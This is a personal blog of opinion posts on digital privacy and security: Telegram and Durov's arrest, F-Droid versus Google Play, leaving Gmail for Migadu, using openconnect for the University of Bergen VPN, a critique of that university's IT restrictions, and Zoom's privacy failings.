Sergey Budaev

Aug 26, 2024

Durov, Telegram and responsibility

The founder and head of the Telegram messenger, multimillionaire Pavel Durov was detained by police immediately after arrival at Le Bourget airport. French law enforcement have long been unhappy with Durov’s refusal to moderate content and to cooperate with authorities in disclosing information about users suspected of distributing drugs, child pornography, fraud and other criminal activity. Moderation is nearly nonexistent on Telegram except the most severe cases like islamist terrorism: usually banning their public channels.

However, Telegram did also cooperate with Putin's Russia authorities in banning Navalny's "smart voting." Durov's own explanation for this was that "it is better to ban Navalny than ban Telegram in Russia." This is clearly a deceit because a few years before that, Russian authorities have demonstrated their inability to block Telegram.

Durov is positioning himself as a hardcore libertarian protecting all kinds of freedoms, especially the freedom of speech and expression (against evil state). Many believe it is true, hence the wave of public support: #FreePavel.

Du Rove

The real picture is, however, quite different. Apart from the very extravagant personality of Pavel Durov (many still remember as he threw rouble banknotes from his St. Petersburg head office balcony for personal amusement), neither the Telegram platform nor the company in fact have anything in common with protecting liberties. Telegram is quite a standard commercial walled garden platform with the main aim to monetize its growing user base. "Privacy" for Telegram is nothing more than a marketing ploy.

Telegram is advertised as "secure" and "private" although it has from the beginning been devised as a centralized platform aimed to get exclusive control over its users' communication. There is no end-to-end encryption by default. The MTProto protocol used by Telegram is a home-made thing, never seriously audited by cryptography experts. The Telegram client is open source (and is even available in blob-free open source version on F-Droid), but the server is not. So nothing is known about what actually happens with the user's communication data and metadata. This is not a minor thing because Telegram keeps all the data on its cloud servers for user's "convenience." This means that all the messages are unencrypted (for Telegram), and potentially accessible to the third parties.

Fun, soon after Durov's detention in Paris, bureaucrats from the administration of the president in Russia, the ministry of defence and large state owned corporations were instructed to delete their Telegram communications. No, this won't help if everything is kept on the cloud servers. It is well known that Telegram has a reputation of "inaccessible to FSB" and therefore widely used by a range of Russian governmental and military users. These people have been reluctant to use the official "safe" and "encrypted" tools that have full FSB certification because they believe (quite reasonably) that these are all wiretapped. Telegram is also the common communication tool for Russian troops attacking Ukraine. Now it is easy to guess how confused and scared they are!

Every user of Telegram is identified with and linked to the mobile number, which is really a mockery of privacy. Participants of Hong Kong protests were able to verify this: the mobile numbers and therefore personal identity of many of them were easily obtained from by the "private" Telegram by the mainland Chinese police. To access the account of most users (two-step auth is not enabled by default, there is no password for most users!) the attacker just needs... access to the SMS, which is a trivial task for the mobile operator and therefore the law enforcement (or in many cases even a hacker using social engineering to reissue the SIM-card). Then the content is not encrypted, except for the "secret chats" that only few actually use.

Some years ago, Russian authorities tried to access Telegram contents of quite a few members of Putin's opposition by secretly coercing the mobile operators to forward authentication codes sent by SMS. Admins of quite a few Russian and Belorussian opposition chats and even regular subscribers were also identified. There exist several OSINT tools that help identify Telegram chatters, some are available for just everyone for a moderate price.

Not only privacy and security, but even data integrity of Telegram is questionable. The company protocols of dealing with the data are questionable. There are rumors that some years ago Durov himself deleted Telegram chats of his personal rivals at will.

Telegram is "free" to users, but running it incurs huge costs. Who pays then? The users actually pay for it with their ever accumulating private data (their privacy), their increasing flock size, traffic and now also paid subscription and the TON cryptocurrency.

Telegram has always been a secretive non-transparent company. There are rumors that its major investors include Emirates' funds with the major beneficiaries from Russia. Even though Durov usually denies any links with Russia, Telegram very likely significantly depends on Russian oligarchs' money. But little is still known about the financial affairs at Telegram. Also little is known about the organizational structure of Telegram. Nonetheless, everything looks like a single person--the CEO Pavel Durov--has the complete control over everything, from technology to HR, finances and relations with investors.

It looks like Durov has created a platform advertised for "freedom" and "privacy," inviting everyone for whatever purposes, even the most evil and criminal ones. But Telegram was deliberately created as a single centralized platform, apparently to benefit from the full control for profit. Full control, however, involves full responsibility, including law enforcement access and moderation.

"Guardians of internet freedoms" say that accusing Durov of complicity in crimes the users do is equal to accusing the manufacturer of a hammer: everyone can use it for nailing as well as for killing, all outside of the maker's control or even knowledge. But this is not true. In the case of Telegram, the instrument is not given to the users. Users do not possess it. They are just allowed to hold it for a while. Durov's situation is equivalent to renting out a hammer for securing profits, without asking if it is actually used for nailing or killing. And even knowing that in many cases it is in fact used for killing, breaking into houses and other criminal purposes. The purpose is profit. Then, those who rent out the hammer are responsible for what their paying users do with it. Any benefits obtained from criminal abuse of the hammer are complicity, even if indirect.

The only way to protect liberties and freedom of speech and expression is through decentralized or federated platforms. Then, the end user is the owner of the decentralized unit and bears full responsibility for his/her own use. Decentralized technology is not only safer and more secure, but also more responsible.

Apr 15, 2024

Bruk F-Droid i stedet av Google Play Store

Googles Android Play Store blir verre over tid. Det blir stadig mer strødd med ubrukelige apper som utelukkende tar sikte på å vise reklame. I navnet av "personvern" gjennomfører Google ytterligere hindringer for både utviklere og brukere, mens ekte skadelig programvare blomstrer på plattformen. Det ofte blir et mareritt for utviklere av åpne kilde programmer som er fokusert på personvern og sikkerhet. Den nylige de-listingen av Snikket—en sikker, personvernsentrert melding app—viser at personalet som er ansvarlig for applikasjonsvurdering på Googles side, er mentalt forsinket idioter. Sjekk ut hele historien her: https://snikket.org/blog/snikket-google-play-removal/.

Google, er det slik at ansatter med IQ<50 koster mindre? Eller alle mennesker på Google ble erstattet med en AI som mangler intelligens? Mange utviklere gir opp å slite med idioter på Googles applikasjonsvurdering og slutter å distribuere appene sine i Play Store (her kommer en annet eksempel).

Situasjonen kan være så absurd at åpne kilde Conversations appen som går ikke fri (NOK 47) på Google Play måtte forringe funksjonaliteten på denne distribusjonsplattformen. Den samme appen går gratis med fult funksjonalitet på F-Droid.

Men det er en løsning for alle Android-brukere: bare installer F-Droid, en appbutikk som publiserer åpne kilde programmer uten reklame, traking, datalekkasjer, skadevare og bakdører.

Den eneste garantien mot skadelig programvare er åpen kildekode som alle som helst kan sjekke og revidere: mange øyne oppdager problemer tidligere og bedre. F-Droid gjennomfører "reproducible builds" som sikrer at binær apk bloben er bygget av samme kildekoden som utvikler har publisert, så det finnes ikke noe uautorisert tilleg eller endringer (apk fra Google Play inkluderer Googles blober for reklame og tracking). Det anbefales å søke apper først på F-Droid og gå til Google Play kun når den ikke er tilgjengelig. Da skal Google Play brukes bare for apper som er klarert på forhånd, f.eks. banken.

Apr 22, 2022

Goodbye Gmail

The old good email remains the most critical digital communication tool. What makes the venerable email so useful and sustainable over the long time is its openness and standardization. Email is radically different from the modern "apps" which integrate all pieces of technology--the server, the client, and the protocol--by a single monopolist provider. With email, we are free to choose the server (provider) and client with any combination. It provides enormous flexibility, added privacy and security. Indeed, the provider does not control my client and cannot add backdoors; there is no monoculture of client software with all the related security risks (any security vulnerability is global). Email is one of the few pieces of technology that is very resistant against internet censorship. Repressive state can easily block a web site and even force an app store to remove an app (as the Navalny's "Smart Voting"). Also, an app store can delete it for any other bizarre reason. But it is much more difficult to block a mailing list: it is easy to redeploy and recreate it on a different server (without the users even noticing anything). Furthermore, The user can easily create several different email-based identities (e.g. a separate one for politically sensitive activity) which adds anonymity. And anonymity means physical security in some countries.

It is not surprising that many internet services use the email address to register users, authenticate, restore password and other similar purposes. Open, standardized and decentralized email is one of the most critical technology everything else depends on. After all, the flexibility offered by the email technology--the freedom to choose all pieces (provider, client etc.) is just very very handy, at least for an advanced user (you can add new features on top of what the provider realized, even against the provider's will--isn't it convenient?).

The whole email technology is build around open protocols rather than a centralized platform. This facilitates competition, makes for better and fairer service and reduce possible impacts of malicious monopolists (Masnick, 2019).

Google's Gmail has long been one of the main pillars of email, millions used to rely upon every day. We should praise Google for popularising email as the basic mainstream technology among the masses. I started using Gmail many years ago when it was in its "beta" and available only by invitation. At that time Gmail openness and unrestricted nature was just blazing. The web interface was lightweight and not really cluttered with ugly banners, unlike other email providers. There were ads but they were small and unobtrusive. Gmail had long supported all the basic protocols (POP, IMAP, SMTP) that allowed to use any standard compliant client software, and that was available for free (some other providers were more greedy and allowed this only on paid plans). Google's POP, IMAP and SMTP implementations have been (and still remain!) quite idiosyncratic, incomplete and not really standard-compliant which caused various glitches (e.g. message deletion and default sorting are weird, I always hated Gmail's labels). But this was bearable.

The serious privacy problems and threats of Gmail, such as user email scanning for context-specific advertising (until 2017) or AI tool which could provide access to some pieces of data to third-party developers. That is nearly a disaster that cannot be fixed because spying on the user's data is at the heart of Google's business model. But who cares as long as it is free! I have long been using and promoting PGP encryption which could fix many of the privacy (and security) problems. Yes, PGP is crucial for individuals and businesses and yes, a motivated user can encrypt.

Gmail still remained free and relatively open while an alternative of deploying private email server is time-consuming and tedious (e.g. ensuring that emails from a tiny private server don't end up in spam folders of intended recipients). I used to pay with some of my privacy to get the usability and stability of Gmail.

But over time I became increasingly concerned about the clear trend taken by Google to make the open email more and more difficult to use outside of the Google monopolistic ecosystem. There are signs of the famous embrace, extend, and extinguish strategy. Gmail API is featureful and powerful... but only if you really need the complexity and like to play with the Google rules. If you don't like to see ads, for example, and for this use a standard IMAP mail client of your choice, your must suffer. If you need full PGP support on a mobile client, never offered by Google, you are out of luck and have to use an IMAP-based mobile app like Android K-9 Mail that requires sacrificing some usability.

Google tends to draw its users by all means into its browser, its own apps and APIs to get more user's private data and show ads. For that matter, Google's security usability has become just terrible. The intrusive access-blocks when a mobile user with an IMAP client moves across IP addresses can drive anyone crazy... Access can be blocked even if the user switches just to the next IP address within the same provider's IP pool.

Google security alert

I have to use VPN with fixed IP address to avoid these stupid blocks!

To help keep your account secure, Google will no longer support the use of third-party apps or devices which ask you to sign in to your Google Account using only your username and password. Instead, you’ll need to sign in using Sign in with Google.

The Google's insistence on rather complicated and heavyweight OAuth2 mechanism for basic email client access (remember, most email programs do not require you to enter your password every time, diminishing the risk of phishing) is understandable only as a means to limit all uncontrollable third-party clients. Yes, OAuth2 is logical for complex workflows of data access delegation across multiple web-based services with different login/password combinations (the "Auth" stands for authorization, not authentication). Whenever I need access to my own emails I need to authenticate my identity granting full access. But isn't OAuth2 client secret kept on the device just as the username/password combination? Yet, limiting the (power) users access to their own data provides just an illusion of security at a large cost to usability and compatibility.

The Google's move to OAuth2 authorization seem to point that the Gmail-hosted emails do not belong to me any more. My emails are now owned by Google, who just "authorizes" (delegates) me access to some of the data without trusting me. This is not what I need from my private communication. Does Google pretend to "zero-trust" any third-party apps? Maybe it doesn't trust its users (the owners of their data), assuming they are all idiots?

If you think your users are idiots, only idiots will use it [your service]. --- Linus Torvalds

And there is another side effect: as Google increasingly deployed more and more heavyweight frameworks and technologies, Gmail became very sluggish and bloated. It is cluttered and confusing, especially to those who don't use it often enough to remember all the idiosyncrasies. And it's still poorly adaptable to the user's needs. How can I get a fixed-width font for my plain text message? Where is my favourite basic (and very fast) HTML web interface?

Enough is enough. I now go away from Gmail, and primarily not because of big privacy concerns (which is quite expectable) but because of deteriorating usability and growing incompatibility. It looks like the people at Google have forgotten their old motto "Don't be evil." While I have been paying Google with my privacy currency in the past to get functionality and usability, the benefits of Gmail continuously went lower and now reached an unprofitable level.

Migadu is my choice

There are many hosted email providers, some are focused on privacy and security. For example, Protonmail is a fantastic project that makes it nearly trivial to use PGP even for an uninitiated. But its drawbacks are that it is non-standard and has too high publicity making it quite undesirable in certain authoritarian countries. Simply said, if you use Protonmail in some countries you may be suspected; Protonmail can be blocked by the authorities, and worse still, blocked in quite idiosyncratic way. Some services may also reject registration using this service.

What I have finally chosen is Migadu. It is not yet another standard email hosting provider. It is a domain-based service. Once you have got your own domain name (domains are now cheap), you can make your own email service for your domain. That simple. This makes it super useful for companies, families, groups and NGOs without large budgets. For a reasonable price you get nearly your own mail server with many configurable features (any custom mailboxes, aliases, forwarding, regexp, webmail, etc.) but without the need to maintain all this complex system.

If you have a web site, you necessarily get a domain name for it. Now it's easy to get your own email identity. True that some hosting providers also do host email. But if you decide to switch to a different hosting it will create a trouble: you need to move also email and this fact strongly limits your next choice. Having a completely indpendent email system for your existing domain avoids such hoster lock-in and makes life much easier.

By the way, the Migadu standard webmail interface is sleek and very simple. Looks modern but lightweight and quite fast. No bloat whatsoever, only the most crucial functionality. I am not big fan of web-based email, but use it from time to time. And there is even some very basic support for PGP! (But remember that web-based PGP is not a very secure solution.)

I found the mail server configuration (including more esoteric stuff like DNS setup and DKIM signatures) very easy. In my view you do not need an IT degree to configure your email server with full functionality. I like the admin panel, it is minimalist and easy to use, no stupid and distracting visual effects. And Migadu is advertised as fully open standard compliant service without proprietary glitches and limitations. So any standard (open source or closed source) software is very likely to be fully usable. This freedom is very important. And they are also clear and honest about the limitations and drawbacks.

Finally, goodbye Gmail.


PS: Disclaimer: I have no links with Migadu.

This post is also published on Substack and Medium

Nov 10, 2021

How to use open source openconnect for UiB VPN

Cisco AnyConect is an unethical software. First, it is proprietary and closed source code, although the nature of its functioning makes it capable to control all the user's network traffic. Even worse, Cisco AnyConnect implements controversial functionality making it technically a kind of malware: the so called "posture" (HostScan) service is scanning the user's device and (steals?) sends various information out (Cisco said this is done "to improve security," e.g. to avoid non-certified and unauthorized devices), Cisco VPN client can officially download and install spyware trojan on the user's device (Cisco also advertises the trojan as a tool to "improve security"). Also, the VPN client can reroute the network settings in arbitrary way without the user's consent and knowledge. All this is a serious security and privacy threat. (And Cisco products have a bad history of serious security flaws that look like backdoors.)

It can be justified to run Cisco AnyConnect on a corporate-owned machine (understanding the consequences for the user's privacy and security). But installing it on the user's owned private devices should be avoided.

Openconnect

Openconnect is an open source SSL VPN client that supports several protocols including Cisco AnyConnect. It can be used as an alternative to proprietary Cisco software that may in some installation include controversial and undesirable functions such as uncontrollable network re-routing, proprietary scanning module, installable spyware trojan etc.

For more information go to the Opeconnect web site: https://www.infradead.org/openconnect/.

Install openconnect from the standard Linux repository, e.g. in case of Ubuntu/Debian use:

apt install openconnect network-manager-openconnect \
            network-manager-openconnect-gnome

Server settings

To connect to the vpn, go to the network configuration entry, then add a new VPN connection, choosing Cisco AnyConnect Compatible VPN (openconnect) in the list.

To connect to the UiB VPN one needs this:

  • Server gateway: vpn3.uib.no
  • UiB username (short name, in the following examples zzz000)

Basic connect using command line

The simplest command to connect to UiB network is:

sudo openconnect --user zzz000 vpn3.uib.no

Note that sudo is required to set up the tun device (It is, however, possible to configure openconnect to run as unprivileged user, see http://www.infradead.org/openconnect/nonroot.html).

There are also a few useful options:

  • --background run openconnect at the background
  • --syslog send messages to the system log
  • --pid-file /var/run/openconnect.pid use specific pid file, then it is easy to switch off the background vpn using this command: kill $(cat /var/run/openconnect.pid) assuming process pid is saved to /var/run/openconnect.pid

These options result in this command:

sudo openconnect --background --syslog --pid-file /var/run/openconnect.pid  \
                 --user zzz000 vpn3.uib.no

running on terminal

Connect using graphical user interface

Most Linux desktop environments (e.g. Gnome, xfce etc ) have graphical utility that is accessible in the system tray. To configure it use:

  • VPN protocol: Cisco AnyConnect
  • Software token authentication: TOTP

GUI step 1

Other options should be left intact.

At login, the GUI program will ask the University user name and password. Enter and press Login

GUI step 2

Then, Microsoft authentication code will be sent via SMS on the mobile phone.

GUI step 3

There may be a caveat: DNS might not work with the default configuration (web sites are inaccessible by their http names). If this is the case, go to IPv4 settings and manually configure DNS servers, such as Google DNS 8.8.8.8 and 8.8.4.4

GUI step 4

and then to IPv6 settings and enter DNS servers manually, e.g. Google DNS 2001:4860:4860::8888, 2001:4860:4860::8844

GUI step 4

Now UiB VPN should work in a private way. Openconnect turns out to be a useful tool to connect to the UiB network in a simple and straightforward way.

Microsoft Windows

Openconnect also works on Microsoft Windows. If you are using Chocolatey then there is a port that can installed be using this command:

choco install openconnect-gui

Disclaimer: I did not try it.

References

Oct 25, 2021

Are we going to work in a paper jail?

Main points

  • Any major university IT infrastructure is huge and heterogeneous, it is used by lots of people, many of whom are experimenters and explorers, who like challenge, rather than office robots. Most users are busy, focus on research and study and hate additional (and especially sudden) hassle. This is why consideration of the usability cost is absolutely critical for IT security strategy.

  • Creating a walled "trusted" area by a firewall--the perimeter model--is an outdated approach to security at the age of universal zero-trust deployment. Instead of following an already outdated approach, a more sensible strategy is to start implementing components of the zero-trust model, including score-based trust and wide use of personal identity hardware tokens.

  • Major focus in security should be shifted from solely technology components to the end users, creating incentives to use more secure technology, rather than making additional hassle.

The great firewall

There was a very rapid trend towards an increasingly restrictive IT policies at the University of Bergen implemented from October this year. While the aim of “Increasing security” is laudable, I think the planning and implementation of the policies has several flaws which may compromise its declared aim. The biggest problem is that the UiB IT is huge and heterogeneous. There is a variety of services with different levels of security risks, many users, with diverse needs, user cases and environments, competences, personal backgrounds and personalities. This requires a more sensible, flexible and inclusive approach. If this is not the case, rigid policies will not make the IT environment significantly safer. Instead, it may hamper normal work for some users, and in the long run compromise both security and privacy contrary to the declared aim.

Security, including the computer security, is not a fixed state, it is rather a continuous process. Security is not limited solely to the IT technology. Technology alone cannot bring security. Security is primarily a human rather than technical problem. Indeed, most dangerous security breaches did not target encryption algorithms, many even only partly involved exploitation of software and hardware vulnerabilities. They typically make use of human factors, such as social engineering, trust exploitation, human mistakes and so on. Successful tracking and catching cyber criminals do not often primarily target technology, but usually depends on exploiting human errors, negligence, laziness and other similar factors. This is why the current primary focus on just technological restriction of the IT environment, aimed barely to its isolation from the outside networks, is neither sufficient nor efficient. A more balanced, flexible and holistic approach is needed.

Security can only work at a balance with usability. Moreover, there is often a trade-off: technological security restrictions often make for worse usability. A completely “sealed” environment would be just too restricted to be usable. Usability is indeed a primary factor: research shows that many security problems and users’ hesitance or unwillingness to make use of (more) secure tools is caused by their imperfect usability. Furthermore, within a hugely heterogeneous environment, there would be no single optimal balance between security and usability. An important consequence of this is that a flexible and inclusive approach to security, aimed at different degrees of balance with usability, is important.

The technical part of security should start and primarily respond to specific threat model(s), not theoretical or vaguely possible risks. And the threat model(s) should be connected with the real life statistics, e.g. how many breach attempts usually occur, to which of the services, from which IP addresses etc. It does not make sense to install solid steel screens on all windows in our department building to make it “more secure” from any kind of possible breaches; even if there are crowds of hungry zombies walking outside, it is just enough to protect the first floor.

Blanket unconditional restriction of the UiB IT network environment as is being implemented does not seem to respond to specific consideration of threat model(s), the variety of users, needs, sub-environments etc. It looks like a desperate attempt to seal everything in a hope that a jailed environment, isolated from the outside, will be more secure. This is a wrong assumption.

Some specific problems

Multi-factor authentication via TOTP: Not a panacea.

KI 0780 introduced multi-factor authentication policy. This is generally a crucial component to improve security, if implemented sensibly. However, not all implementations would automatically improve security or provide a sufficient balance between security and usability. What is called “multi-factor authentication” may not even be really multi-factor. The definition of multi-factor authentication involves the use of several things for authentication, typically something you know: password, plus something you own, e.g. a mobile device (SIM) and something you are e.g. fingerprint. If the password is entered using the password manager software saved on the mobile device and the “multi-factor” SMS comes to the same mobile device (or password entered and SMS read on the same computer that links to the smartphone as is now the norm within the Apple ecosystem), the whole idea of two factors is ridiculed: the smartphone becomes the single authentication device. It can be at best called “two-step authentication,” a weaker mechanism. The SMS (and anything based on phone-line or phone-number) is actually one of the poorest authentication means due to the long known and essentially unsolvable vulnerabilities in the GSM, SS7 and other related protocols. SMS can be hijacked by malicious smartphone apps (e.g. Google Play store does not even approach 100% safety, there are occasional scandals with malware in apps with very substantial audience) or even basic GSM dumb phones (there are reports about quite a few Chinese-made GSM button-phones having factory-installed malware). Worse still, some of the modern and widespread multi-factor mechanisms such as push-based popups are also easily exploited (even worse, they make for a bad habit of clicking “approve” without thinking). If authentication is done on a web page, it is usual to save the authentication cookie to avoid repeated two-factor invocation. However, cookies are not necessarily secure, long kept cookies might be hijacked by malware, there is a well known mechanism of CSRF attacks, there is also a big privacy drawback (e.g. tracking). The current industry trend is to go away from the cookie mechanism in the mainstream browsers (e.g. Google Chrome will not allow any third-party cookies from 2022). A sensible user policy is to reduce the lifetime of any cookie. However, it makes the “two-step” authentication as is currently implemented at the UiB a hassle. Indeed, the user then has to go via the SMS code process nearly every time he or she logins, even if it is done from the same IP address and the same device.

The ssh access to the login.uib.no server have apparently disabled the best-practices secure mechanism of ssh-key authentication (incidentally, if the key is combined with a passphrase then it is actually a two-factor authentication itself!) and forced the potentially week password-based mechanism with SMS code. There seems to be no other TOTP mechanisms except SMS at the time of writing!

A better mechanism is to use the time-based one-time password code (TOTP) authenticator application on the mobile phone. This is in fact recommended at the Microsoft and UiB web pages as a more secure alternative (via Microsoft authenticator app). While TOTP is better than SMS, it is far from perfect because it is potentially vulnerable to phishing and the MITM attack and the secret seed should be kept on the authenticator application as well as on the server to make synchronised generation of TOTPs possible.

Personal hardware tokens

There is a much better and stronger two-factor authentication mechanism: U2F and FIDO2/WebAuthn that use hardware security device keeping the private key. The security token, in the form of a small USB or NFC key can both authenticate on the server and authenticate the server itself with strong asymmetric crypto, making phishing and many other attacks virtually impossible. Many such devices also implement biometric (e.g. fingerprint) identification with privacy-respected way (e.g. biometric data is not sent from the user's device). This is now a mature technology that is implemented in all major web browsers, can be used with ssh key-based authentication, GPG-enabled email etc.

The best known hardware token is probably the Yibikey and there are a few others on the market (e.g. Google Titan, FEITIAN, Token2, Thetis etc.). They can be not very cheap, but not prohibitively expensive either.

VPN needed for all, even the most essential everyday services

The UiB IT services have previously used several open and industry-standard VPN mechanisms (IPsec, OpenVPN) so that different users could easily find a solution working for them individually. Now, there is a single closed and proprietary mechanism: Cisco AnyConnect including both unique protocol (SSL-based) and the software client. This mechanism may work for many but not necessarily for everyone (e.g. unlike open solution, it may not be available on some computing platforms, some enthusiasts of the open source might find restriction to a single proprietary tool unethical, etc.). There are rumors about unreliable connections with Cisco AnyConnect, and that OpenVPN was previously more stable for some users. It is indeed likely if Cisco AnyConnect is used over certain restrictive environments with DPI that block connections to certain ports or UDP traffic even at the 443 port, or otherwise censor VPNs (e.g. some public WiFi networks may have such limitations). Some implementations of the OpenVPN, in contrast, can be configured to mimic normal SSL web traffic (e.g. shadowsocks) and work even under the Great Chinese firewall. There is a clear benefit at not prohibitively high cost to provide at least some limited support for such a mechanism for certain users (e.g. special needs or during travel). It might even be provided only on special request with some substantiation. Also, the reliability statistics internally used by the IT department might be biased if not all users report minor and transient VPN issues. So there is a case to deploy and support alternative VPN solutions, perhaps even on a smaller scale.

It sounds quite reasonable that providing and supporting a wider choice of VPN solutions for a minority of users would not be economically feasible. However, it is certainly not the case when just all the services become available only from within the UiB internal network jail. Then, there should be more flexibility and inclusion, several ways to get into a jailed environment comfortably by a variety of users in different environments. It is just too unbalanced limitation to mandate the use of a single restricted VPN to get email from home or from an airport, for example. A better alternative is of course to relax the policy moving at least the most essential but inherently secure services out of the jail.

Is the universal jail really essential for everything?

One issue with unconditional moving of all the UiB IT services into a jailed environment is that this would not reflect sufficient balance between security and usability. It is of course good to keep potentially less secure services (e.g. RDP) jailed. But are real threats substantial enough to hide just everything into such a jail?

Are there any real-life statistical or other data evidencing that accessing the university email system from an IMAP client with normal SSL/TLS protection can be dangerous? The user in such a case does not need to enter the UiB password for login (it is saved into the software, often encrypted on devise), so phishing risk is near zero. The authenticity of the IMAP server certificate is usually checked through the standard SSL mechanism. So is there any real security advantage to move such essential everyday tool as email into the jail, does this just induces additional hurdle?

Another example is connecting the UiB login.uib.no ssh server. Many (presumably less advanced) users can use the ssh with their default password. Then, the “two-factor” authentication is a serious security improvement of course, even if it is in fact used in the weakened two-step authentication mode. However, some other users can configure ssh-key authentication, which is a much more secure mechanism. Will the manual entry password with two-factor authentication really provide sufficient security improvement in such a case? Will it provide anything beyond a negligible effect if the user has already authenticated with SMS on the same device, or a different device from the same IP address shortly before? Is there any improvement in security that substantiates such degradation of usability?

The question is this: is the same level of restriction and jailing really essential for all services, often and rarely used, potentially less secure and highly secure, easy and difficult to exploit, those with documented attacks and those that present little interest to intruders? Does not it just provide usability costs not balanced by any security improvement?

Human ingenuity: Is the jail actually made of paper?

It is clear that equally and unconditionally restricting just everything, especially, without considering usability costs, will not automatically increase security. The situation can well be worse: lower security as well as compromised privacy.

For example, to avoid all the nuisance, users may switch to using third-party commercial providers, such as increasingly use private gmail.com accounts, Dropbox etc. Users may use smaller, more cryptic online tools and applications (e.g. file sharing sites, communication tools, some advertised as encrypted) with uncontrollable and unknown security. Some of them might be owned and run by community and volunteers, some could be compromised or deliberately devised to gather data, track users and spy.

Some of more qualified "insider" users might successfully hack the system to get nuisance-free access to the UiB jailed environment from outside. It is actually not a hard problem. One possible solution is to use the reverse ssh proxy. It does not even require administrative rights and can be done by a motivated average level computer user after 20 min of reading the ssh manual. More advanced users can create stable backdoors implementing such things as proxy jump and port forwarding that will sustain reboots, logouts etc. It is also easy to add various layers for plausible deniability and obfuscation.

There are much more tools, ways and possibilities to implant and efficiently hide a backdoor into the UiB jailed environment. All that is required is various open source components freely available on the net and an incentive to do such unauthorized actions. It is not just an abstract theoretical threat but real and serious risk left behind the current jailing policy.

Imposing a jailed environment without considering trade-off of flexibility and usability has this biggest problem: It may create an incentive to break the rules to make life more hassle-free. A related and serious problem is that the IT department would not be able to control this and in most cases will remain unaware of the issue. It is virtually impossible to detect that users communicate and share sensitive medical or personal data over a private google mail account, for example. A cryptic backdoor implanted on the computer within the UiB jail with sufficient plausible deniability can remain long undetected without costly and tedious forensic analysis. But such an analysis will be conducted only by the police after a catastrophic break-in has occurred, too late.

There are many advanced users, smart students, at the university. Many well understand (and they do discuss!) the inconsistency of the restrictive jail policies. Some people may find it quite fun to overcome the silly rules imposing unneeded hassle. It can indeed be an interesting challenge but, unfortunately, an additional incentive.

A further problem is that many users usually do not bother to report smaller or transient problems at the normal issue tracking channels such as hjelp.uib.no. They may not be acquainted with it or just consider it a hassle if they are very busy (and they are very busy with real things to hang at tangential IT problems). A quite typical way of action is to ask someone nearby for a help or workaround. Therefore, if the knowledge of the ways for implanting backdoors and the obvious fact that it is quite easy and just solves the problem, is spread within the student and staff, it can create a real security disaster. Unfortunately, backdoor skills are very likely to spread if the IT department continues to create more and more restrictive jail and provide more incentives to break the rules. Then, it would be essential to further tighten the jail: inspect all devices on entry and refuse entry to everyone with IQ > 0.60. The simple fact is that the jail that is being happily built is not made of rock and steel, it is paper.

The situation at the UiB is quite different from a typical commercial organization that the standard security recipes are based upon. There are many brilliant students and staff out here, many are young and like challenges. There can be those who would not hesitate to take risk, given the benefit of making one’s own hassle-free environment is high, the cost is zero while expected risk is rather low. Making a backdoor is indeed a way of learning technology that is fun and another added incentive. Many folks are already aware of various software tools and know how to use their black magic. People are ingenious, and people at UiB are on average much more ingenious than outside. What is the threat model for developing the jailed IT environment? Is to protect the UiB from outside hackers? It is a wrong model because many such hackers are already within the jailed environment and are ready and to get the challenge to punch its feeble paper walls from inside.

What should be done?

Inconsiderate and inflexible jailing of the UiB IT networks should certainly be slowed down before it is too low and people started using third-party tools and making their own unauthorized solutions. There should be a serious analysis on what must be implemented and over which time scale so the users can get acquainted and do not just suddenly get huge hassle. As to now, the “analysis” seems to be mainly focused on “what is suddenly broken down once we put everything into a jail”; this is not acceptable. The policies should not be based mechanistically on some manual made for a different type of environment, they should be inclusive, flexible enough to adapt to the complex, diverse and heterogeneous UiB environment. The main focus should switch from technology to people: how to reach most of them (they are busy!), make security improvements minimally obtrusive, teach very busy people sufficient security skills without much hassle. Specifically, the most important information should not be sent by global mailing list that may disappear in user’s mail filter, but must be directed personally to each user (it isn’t prohibitively hard to write a script for this, substituting %NAME% with the real user’s name).

The technological part of the solution should develop sensible threat models based on attack and usage statistics. It should be governed by real risks rather than desire to just protect everything quickly and at all costs. Some of the restrictions already applied can be relaxed. A reasonable solution is to apply more sensible score-based security mechanism, e.g. including IP based rules for two-factor or two-step authentication. Some of more secure services, can for example, be available without firewall restriction if the user comes from his/her frequently used Norwegian home IP address (to improve usability while still reducing potential attack surface). This efficiently transforms a jail into a continuum adapting for the threat and uncertainty level. It will also pay back to demonstrate the practical benefits of client-side certificate authentication, OAuth2 and similar more phishing-resistant security token mechanisms (e.g. they can relax the need in TOTP/SMS authentication) to all users. The university should also facilitate much wider use of hardware-based authentication devices, such as YubiKey, for proper two-factor authentication, perhaps even distribute such devices freely in some groups if universal deployment turns out expensive. Such personal identity verification hardware devices are actually a crucial component of modern zero-trust security approaches.

The crucial element of the whole policy is to create incentives for using more secure tools. For example, the use of hardware personal identity verification tokens should allow to bypass all or most restrictions, perhaps even the need in VPN. There would currently be little added risk with such a policy, but the users would be much happier to do their work securely whenever they need without hassle. This would require hard work, additional integration and funding. But educating, helping and cooperating with users—not restricting and obstructing them—would be the only viable strategy to achieve increased security in the University environment in reality, not just on paper.

Apr 03, 2020

Is ​Zoom safe to use? Is the company marketing and other information correct and can be trusted?

Zoom privacy and security problems

Zoom has demonstrated significant negligence with respect to cybersecurity. Additionally, the company has shown aggressive marketing campaigns and was caught at providing false information to its end users.

  • Zoom aggressively forces the user to download and install native application rather than use web browser for videoconferencing even though videoconferences will work in the web browser. This is a little suspicious. Browser-based conferences are more convenient for an occasional user and is safer due to browser sandboxing of network applications.

  • Serious security deficiency on the Apple Mac platform allowing any unauthorized remote attacker to activate web camera, connect to a conference and execute denial-of-service attack. Zoom tried to ignore and deliberately hide information about the very serious security vulnerability and was slow to fix it. ​ See here for more details, ​ and here (technical information is ​ here and ​ here). Zoom management response seem to point to quite irresponsible corporate culture.

  • More recently it appeared that Zoom was sending users' data to Facebook servers without the user's consent. This is now fixed. See ​ Vice paper ​ and this follow-up.

  • Zoom was caught at providing false and misleading information that the videoconference has "end-to-end" encryption while this was not so. Check out this. The explanation for this provided by Zoom is unsatisfactory.

  • Zoom had a serious security vulnerability that could lead to user password leak in Microsoft Windows. ​ See here for details.

  • Zoom has a strange privacy policy that, even though states that "privacy is very important to us," requires quite large collection of private user's information. There is little explanation about to why this information is collected. Unlike many other similar companies, Zoom does not release transparency report(s). See here: ​https://zoom.us/privacy

  • Electronic Privacy Information Centre has filed complaint to FCC

    • alleging that the videoconferencing company Zoom has committed unfair and deceptive practices in violation of the FTC Act. According to EPIC, Zoom intentionally designed its web conferencing service to bypass browser security settings and remotely enable a user's web camera without the knowledge or consent of the user.
  • See more details here

  • There is a growing concern on the privacy deficiency in Zoom, for more details see ​this and ​ this. Also see The Guardian.

